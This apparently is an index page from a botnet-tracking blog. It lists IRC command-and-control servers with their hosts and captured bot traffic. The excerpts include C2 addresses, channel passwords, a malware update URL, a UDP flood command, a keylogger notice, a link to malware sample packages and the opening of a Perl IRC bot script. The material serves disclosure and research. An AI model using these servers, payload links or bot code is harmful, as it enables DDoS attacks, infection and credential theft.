Remote Host Port Number 109.68.191.160 1863 PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 40 domain(s) NICK n{US|XPa}civmqel USER civmqel 0 0 :civmqel JOIN #IrcPeru PeruRulz!! JOIN #US PRIVMSG #IrcPeru :[d=”http://magicforkidsparty.com/images/Thumbs.db.exe” s=”159744 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataQcxaxq.exe” – Download retries: 0 174.120.234.158 80 199.15.234.7 80 200.63.96.41 80 PRIVMSG #IrcPeru :[DNS]: Blocked 0Read more...
119.59.99.235(ngrBot hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)
Remote Host Port Number 119.59.99.235 1234 PASS priv9 199.15.234.7 80 NICK n{US|XP}xqtebyy USER xqtebyy 0 0 :xqtebyy JOIN #ngr HELO Now talking in #ngr Topic On: [ #ngr ] [ .stop right there ] Topic By: [ bob ] * Home.Town sets mode: +o ru (ru) .udp 82.8.195.242 8080 120 (ru) .udp 82.8.195.242 8080 120Read more...
cyba.sytes.net(irc botnet hosted in Seychelles Ideal Solution Ltd)
Resolved : [cyba.sytes.net] To [193.107.16.150] Remote Host Port Number 193.107.16.150 20 NICK NEW[XX][XP]6615537921 USER 6615 “” “TsGh” :6615 MODE NEW[XX][XP]6615537921 JOIN #yup JOIN #ys PONG :irc.kittynet.com Remote Host Port Number 193.107.16.47 20 96.9.162.23 80 NICK NEW[XX][XP]4288113806 JOIN #galla PRIVMSG #galla :Down & Exc…OK PONG :irc.kittynet.com USER 4288 “” “TsGh” :4288 MODE NEW[XX][XP]4288113806 JOIN #ys PRIVMSGRead more...
64.32.28.19(irc botnet hosted in United States Huntington Beach Sharktech Internet Services)
Remote Host Port Number 64.32.28.19 6667 USER ^GCIeq`{TehIQ[yuE ^GCIeq`{TehIQ[yuE “^GCIeq`{TehIQ[yuE” :^GCIeq`{TehIQ[yuE NICK ^GCIeq`{TehIQ[yuE PONG 422 JOIN #ib :insbt PRIVMSG #ib :keylogger enabled hosting infos: http://whois.domaintools.com/64.32.28.19
90mb malware samples
another package with 90mb malware samples have fun reversing Download: http://e12ade83.urlbeat.net
216.245.202.52(linux bot hosted in United States Limestone Networks Inc)
here the bot used from heckers: #!/usr/bin/perl ################################################ use HTTP::Request; # use HTTP::Request::Common; # use HTTP::Request::Common qw(POST); # use LWP::Simple; # use LWP 5.53; # use LWP::UserAgent; # use Socket; # use IO::Socket; # use IO::Socket::INET; # use IO::Select; # use MIME::Base64; # ################################################ my $datetime = localtime; my $fakeproc = "/usr/sbin/apache2 -k start"; myRead more...
68.53.67.92(ngrBot hosted in United States Murfreesboro Comcast Cable Communications Inc)
Remote Host Port Number 199.15.234.7 80 68.53.67.92 6667 PASS .. NICK n{US|XPa}uqslazq USER uqslazq 0 0 :uqslazq PONG :9D3E1772 JOIN #!hot ngrBot Now talking in #!hot Topic On: [ #!hot ] [ !mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n ] Topic By: [ qwerty ] Modes On: [ #!hot ] [ +smntMu ] Quits: qwerty [qwerty@netadmin.ownage.net] (Quit:) heckers inside:Read more...
75.127.109.65(ngrBot hosted in United States Atlanta Global Net Access Llc)
Remote Host Port Number 199.15.234.7 80 75.127.109.65 1863 PASS ngrBot 95.211.0.131 1863 PASS ngrBot 69.64.33.227 1863 PASS ngrBot NICK n{US|XPa}wskgolo USER wskgolo 0 0 :wskgolo NICK n{US|XPa}bkwgsru USER bkwgsru 0 0 :bkwgsru NICK n{US|XPa}golxkxh USER golxkxh 0 0 :golxkxh NICK n{US|XPa}axiziqh USER axiziqh 0 0 :axiziqh to find possible chanels search in the blog forRead more...
60.165.98.198(irc botnet hosted in China Gansu Chinanet Gansu Province Network)
server:60.165.98.198:8680 ircd is protected and i dont have the exe file to know more about chanels etc have fun searching
184.105.71.155(irc botnet hosted in United States Hurricane Electric Inc)
Remote Host Port Number 184.105.71.155 6667 JOIN #1q2w3e4r MODE jrpthu +i PING acool.ca.us.dal.net hosting infos: http://whois.domaintools.com/184.105.71.155